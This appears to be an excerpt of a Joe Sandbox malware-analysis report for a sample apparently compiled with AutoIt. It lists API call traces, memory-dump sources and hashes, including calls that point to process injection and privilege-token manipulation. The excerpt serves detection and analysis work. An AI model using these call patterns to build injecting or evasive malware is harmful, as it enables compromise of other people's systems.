• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
• String ID:
• API String ID: 3902256705-0
• Opcode ID: f2bbfee96f6640d684ad07e13e1ee6ac3518681c1fdbf1145a2f79c94fa9736b
• Instruction ID: a263a8628ee80c652cdad81554cda10b01a618e3be31b287b91f09290579dfd5
• Opcode Fuzzy Hash: f2bbfee96f6640d684ad07e13e1ee6ac3518681c1fdbf1145a2f79c94fa9736b
• Instruction Fuzzy Hash: C3F0F43140025A66CB10BA9BEC119DF7BACEF01317F10042FFD1896281EFB49A8583D9

APIs
  • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
• __lock_file.LIBCMT ref: 004E53EB
  • Part of subcall function 004E6C11: __lock.LIBCMT ref: 004E6C34
• __fclose_nolock.LIBCMT ref: 004E53F6
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: __fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 2800547568-0
• Opcode ID: 865a662af0a8640df6f7f734aa51bb5d117321322f8adc711c40b0b037b8b877
• Instruction ID: 4bc8e800e64bb2b5035d3f1124d463180bb6f41c34d8bde8e116d397b96645d5
• Opcode Fuzzy Hash: 865a662af0a8640df6f7f734aa51bb5d117321322f8adc711c40b0b037b8b877
• Instruction Fuzzy Hash: 3DF09671800A849ADB106B6798057AE77A06F4137FF21820FA828EB1C1CFBC49419B5A

APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 011078CB
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 01107961
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 01107983
Memory Dump Source
• Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction ID: 9a78ad479439329b156fa90c4d21911ebac18a4f4dfffe35eb3990575809c23b
• Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
• Instruction Fuzzy Hash: 4F12CC24E24658C6EB24DF64D8507DEB232EF68300F1090E9D10DEB7E5E77A5E81CB5A

APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ProtectVirtual
• String ID:
• API String ID: 544645111-0
• Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction ID: 3cefd04f657a296c10769d50e434f165c91ec9bf0b779cc14267c9890b42eb8e
• Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
• Instruction Fuzzy Hash: 9B311570A001459BC71CDF0AC48496AF7A2FB49301B3487A6E81ACB355D7B5EDC2DBC9

APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: ClearVariant
• String ID:
• API String ID: 1473721057-0
• Opcode ID: f48fb62b20541c78c2a342e179abe371f5397a305d9e37625cc97336476177a5
• Instruction ID: a9221c3bea8a3f6eb6541fd17dcc1ea454cf8856eb121dd01b112190017e44c3
• Opcode Fuzzy Hash: f48fb62b20541c78c2a342e179abe371f5397a305d9e37625cc97336476177a5
• Instruction Fuzzy Hash: 954125745043409FDB14CF18C448F1ABBE1BF45318F0988ADE89A8B362C77AE845CB86

APIs
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memmove
• String ID:
• API String ID: 4104443479-0
• Opcode ID: 0198539f3ae49afb9957ff804e601377d0f2fc917caa5570bdbeee7bbd527d28
• Instruction ID: 74c2644fbd599cc63df15076c7c606a416f855cebf3b1f3bb92b54cc0cc7ea8f
• Opcode Fuzzy Hash: 0198539f3ae49afb9957ff804e601377d0f2fc917caa5570bdbeee7bbd527d28
• Instruction Fuzzy Hash: D7212772A04A08EBDB144F17F841B797BB8FB24355F20842FF98AC51A0EB7495D0E75A

APIs
  • Part of subcall function 004C4BB5: FreeLibrary.KERNEL32(00000000,?), ref: 004C4BEF
  • Part of subcall function 004E525B: __wfsopen.LIBCMT ref: 004E5266
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E0F
  • Part of subcall function 004C4B6A: FreeLibrary.KERNEL32(00000000), ref: 004C4BA4
  • Part of subcall function 004C4C70: _memmove.LIBCMT ref: 004C4CBA
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Library$Free$Load__wfsopen_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1396898556-0
                                                                                                                      • Opcode ID: 6b7f31a616addb23c862b8e5fccea1181c0120e18f4dac539102cc59179dbb18
                                                                                                                      • Instruction ID: b8e5d808f6ce7ccb992bd1846b13141e1bddf61c5d1c7717f2be55d3e3b39b59
                                                                                                                      • Opcode Fuzzy Hash: 6b7f31a616addb23c862b8e5fccea1181c0120e18f4dac539102cc59179dbb18
                                                                                                                      • Instruction Fuzzy Hash: 6A115B35A00205A7CF14BFB1CD22FAE77A4AFC0708F10842FF941A7181EA789D009759
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ClearVariant
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1473721057-0
                                                                                                                      • Opcode ID: 84f1f9a8fca542764d901a680d046f9c6a48cedfa273fc4004288c7a278525f5
                                                                                                                      • Instruction ID: 5c99d2514b7fba22099efd3b5143b2858b67eff40d89ba764a1a0a2a3ee13b19
                                                                                                                      • Opcode Fuzzy Hash: 84f1f9a8fca542764d901a680d046f9c6a48cedfa273fc4004288c7a278525f5
                                                                                                                      • Instruction Fuzzy Hash: F6211FB85083419FCB54DF24C444F1ABBE1BF88319F05886DE89A57762C735E819CB9A
                                                                                                                      APIs
                                                                                                                      • __lock_file.LIBCMT ref: 004E48A6
                                                                                                                        • Part of subcall function 004E8B28: __getptd_noexit.LIBCMT ref: 004E8B28
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __getptd_noexit__lock_file
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2597487223-0
                                                                                                                      • Opcode ID: 4a6e38217d5fb6567ea459d247b17865837b1b9b0ebea7c85b5a9cf800e8ba1f
                                                                                                                      • Instruction ID: b5334547b65f7c178b1fafaaf0f33f848455137db89e8fd5b5bfc611bd939283
                                                                                                                      • Opcode Fuzzy Hash: 4a6e38217d5fb6567ea459d247b17865837b1b9b0ebea7c85b5a9cf800e8ba1f
                                                                                                                      • Instruction Fuzzy Hash: A7F0F431800684ABDF11BFA38C0579E37A0BF4032BF11840EF418961C1CB7C8951DB59
                                                                                                                      APIs
                                                                                                                      • FreeLibrary.KERNEL32(?,?,005852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 004C4E7E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3664257935-0
                                                                                                                      • Opcode ID: 9660812e55ce1ea1c2dafc6ab3710c91c700e5bd4bff49e30c3ebd0ad3c5c08b
                                                                                                                      • Instruction ID: 0568252730f350ea6a7181b6c9dcf285edc4536ac95db67a68bf07da3f15c86b
                                                                                                                      • Opcode Fuzzy Hash: 9660812e55ce1ea1c2dafc6ab3710c91c700e5bd4bff49e30c3ebd0ad3c5c08b
                                                                                                                      • Instruction Fuzzy Hash: 22F08578100711CFCBB49F24E5A0D53BBE0BFA03293218A3FE1DA82620C33A9840DF04
                                                                                                                      APIs
                                                                                                                      • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 004E07B0
                                                                                                                        • Part of subcall function 004C7BCC: _memmove.LIBCMT ref: 004C7C06
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LongNamePath_memmove
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2514874351-0
                                                                                                                      • Opcode ID: 2d85c5206d55b872e61dc284923f4c5ef9d3c6e8c3da67d9398e742f7f1f2835
                                                                                                                      • Instruction ID: f86f86c88ba2e10cb7c6927d90fd6e61b88654b3bbe0fb646692df8e61cc2ee1
                                                                                                                      • Opcode Fuzzy Hash: 2d85c5206d55b872e61dc284923f4c5ef9d3c6e8c3da67d9398e742f7f1f2835
                                                                                                                      • Instruction Fuzzy Hash: DDE07D3A9041285BC720D25D9C05FFA77DCDF883A4F0441BAFD0CC3204D9A4AC8086D0
                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __wfsopen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 197181222-0
                                                                                                                      • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction ID: 2a107f888c67ae7f9849e7259054cf2552eb18bd99a3a64e1f53489df2e11c98
                                                                                                                      • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                                                                                      • Instruction Fuzzy Hash: 44B0927644020C77CE012A83EC02A493B199B41768F408061FB0C1C162A677A6649A89
                                                                                                                      APIs
                                                                                                                      • Sleep.KERNELBASE(000001F4), ref: 01108121
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.2176622884.0000000001105000.00000040.00000020.00020000.00000000.sdmp, Offset: 01105000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_1105000_9MZZG92yMO.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Sleep
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3472027048-0
                                                                                                                      • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction ID: b2158dc8f1ec538b36dbe3c73b4d1f7089785b50a0b093263aa20e600381f44b
                                                                                                                      • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                      • Instruction Fuzzy Hash: F8E0E67494410DDFDB00EFB4D54969E7FB4EF04301F104161FD01E2281D7709D508A62
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004C2612: GetWindowLongW.USER32(?,000000EB), ref: 004C2623
                                                                                                                      • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0054CB37
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0054CB95
                                                                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0054CBD6
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0054CC00
                                                                                                                      • SendMessageW.USER32 ref: 0054CC29
                                                                                                                      • _wcsncpy.LIBCMT ref: 0054CC95
                                                                                                                      • GetKeyState.USER32(00000011), ref: 0054CCB6
                                                                                                                      • GetKeyState.USER32(00000009), ref: 0054CCC3
                                                                                                                      • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0054CCD9
                                                                                                                      • GetKeyState.USER32(00000010), ref: 0054CCE3
                                                                                                                      • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0054CD0C
                                                                                                                      • SendMessageW.USER32 ref: 0054CD33
                                                                                                                      • SendMessageW.USER32(?,00001030,?,0054B348), ref: 0054CE37
                                                                                                                      • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0054CE4D
                                                                                                                      • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0054CE60
                                                                                                                      • SetCapture.USER32(?), ref: 0054CE69
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054CECE
                                                                                                                      • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0054CEDB
                                                                                                                      • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0054CEF5
                                                                                                                      • ReleaseCapture.USER32 ref: 0054CF00
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054CF3A
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054CF47
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0054CFA3
                                                                                                                      • SendMessageW.USER32 ref: 0054CFD1
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0054D00E
                                                                                                                      • SendMessageW.USER32 ref: 0054D03D
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0054D05E
                                                                                                                      • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0054D06D
                                                                                                                      • GetCursorPos.USER32(?), ref: 0054D08D
                                                                                                                      • ScreenToClient.USER32(?,?), ref: 0054D09A
                                                                                                                      • GetParent.USER32(?), ref: 0054D0BA
                                                                                                                      • SendMessageW.USER32(?,00001012,00000000,?), ref: 0054D123
                                                                                                                      • SendMessageW.USER32 ref: 0054D154
                                                                                                                      • ClientToScreen.USER32(?,?), ref: 0054D1B2
                                                                                                                      • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0054D1E2
                                                                                                                      • SendMessageW.USER32(?,00001111,00000000,?), ref: 0054D20C
• SendMessageW.USER32 ref: 0054D22F
• ClientToScreen.USER32(?,?), ref: 0054D281
• TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0054D2B5
  • Part of subcall function 004C25DB: GetWindowLongW.USER32(?,000000EB), ref: 004C25EC
• GetWindowLongW.USER32(?,000000F0), ref: 0054D351
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
• String ID: @GUI_DRAGID$F$pbX
• API String ID: 3977979337-1742414351
• Opcode ID: afd2ee99c4431973a10a8578fd700ec7398f60182ff27df7c9dfb58713add25e
• Instruction ID: 137c87a34f5f16654e1217ca8573f82fc65f148fd4fe1863178ed61b9b31244e
• Opcode Fuzzy Hash: afd2ee99c4431973a10a8578fd700ec7398f60182ff27df7c9dfb58713add25e
• Instruction Fuzzy Hash: DE42BB38205241AFDB24CF28C888EEABFE5FF89318F54091DF956972A1D771D844EB52
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: _memmove$_memset
• String ID: ]W$3cM$DEFINE$P\W$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)$_M
• API String ID: 1357608183-1390859148
• Opcode ID: 6cda312ddded430c5fff906eaec3ad95d6f125ac6983b5eecb33bfca544b6326
• Instruction ID: 0172b4cd0d1180d243c7cf294b71e9824f0e9297416d2eb1978ff2ee05348a3c
• Opcode Fuzzy Hash: 6cda312ddded430c5fff906eaec3ad95d6f125ac6983b5eecb33bfca544b6326
• Instruction Fuzzy Hash: 6B93B275A04215DBEB24CF98C891BEDBBB1FF48310F24856AE945AB381E7749DC2CB44
APIs
• GetForegroundWindow.USER32(00000000,?), ref: 004C48DF
• FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 004FD665
• IsIconic.USER32(?), ref: 004FD66E
• ShowWindow.USER32(?,00000009), ref: 004FD67B
• SetForegroundWindow.USER32(?), ref: 004FD685
• GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004FD69B
• GetCurrentThreadId.KERNEL32 ref: 004FD6A2
• GetWindowThreadProcessId.USER32(?,00000000), ref: 004FD6AE
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004FD6BF
• AttachThreadInput.USER32(?,00000000,00000001), ref: 004FD6C7
• AttachThreadInput.USER32(00000000,?,00000001), ref: 004FD6CF
• SetForegroundWindow.USER32(?), ref: 004FD6D2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD6E7
• keybd_event.USER32(00000012,00000000), ref: 004FD6F2
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD6FC
• keybd_event.USER32(00000012,00000000), ref: 004FD701
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD70A
• keybd_event.USER32(00000012,00000000), ref: 004FD70F
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004FD719
• keybd_event.USER32(00000012,00000000), ref: 004FD71E
• SetForegroundWindow.USER32(?), ref: 004FD721
• AttachThreadInput.USER32(?,?,00000000), ref: 004FD748
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
• String ID: Shell_TrayWnd
• API String ID: 4125248594-2988720461
• Opcode ID: 10fa70f2324ec6cb33e314d0162ca18eccf8c1bd1935c2ead27037dee924478e
• Instruction ID: b8a8c7bf0dd81f97de0b095babbd53e1eb65a843e06be540cae953e92feb22f7
• Opcode Fuzzy Hash: 10fa70f2324ec6cb33e314d0162ca18eccf8c1bd1935c2ead27037dee924478e
• Instruction Fuzzy Hash: EF31B275A4031CBAEB202BA59C49FBF3E6DEB55B50F104026FA04EA1D0CAB45801BBA5
APIs
  • Part of subcall function 005187E1: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0051882B
  • Part of subcall function 005187E1: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00518858
  • Part of subcall function 005187E1: GetLastError.KERNEL32 ref: 00518865
• _memset.LIBCMT ref: 00518353
• DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 005183A5
• CloseHandle.KERNEL32(?), ref: 005183B6
• OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 005183CD
• GetProcessWindowStation.USER32 ref: 005183E6
• SetProcessWindowStation.USER32(00000000), ref: 005183F0
• OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 0051840A
  • Part of subcall function 005181CB: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00518309), ref: 005181E0
  • Part of subcall function 005181CB: CloseHandle.KERNEL32(?,?,00518309), ref: 005181F2
Strings
Memory Dump Source
• Source File: 00000000.00000002.2175789165.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
• Associated: 00000000.00000002.2175772647.00000000004C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.000000000054F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175874468.0000000000574000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175964673.000000000057E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2175997453.0000000000587000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_4c0000_9MZZG92yMO.jbxd
Similarity
• API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
• String ID: $default$winsta0
• API String ID: 2063423040-1027155976
• Opcode ID: 5c4589b519d40fccfa7fa6b88ce4f5e155796460632c4d2db594640a1b642ea2
• Instruction ID: 29d9df4a0c5475910dad18b179622f3049d0aed61be18886a6434ed7830ddd9b
• Opcode Fuzzy Hash: 5c4589b519d40fccfa7fa6b88ce4f5e155796460632c4d2db594640a1b642ea2
• Instruction Fuzzy Hash: 02814B71800209BEEF219FA4DC45AFE7F79FF05308F144169F914A6261EB358E94DB20
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0052C78D
• FindClose.KERNEL32(00000000), ref: 0052C7E1
• FileTimeToLocalFileTime.KERNEL32(?,?), ref: 0052C806
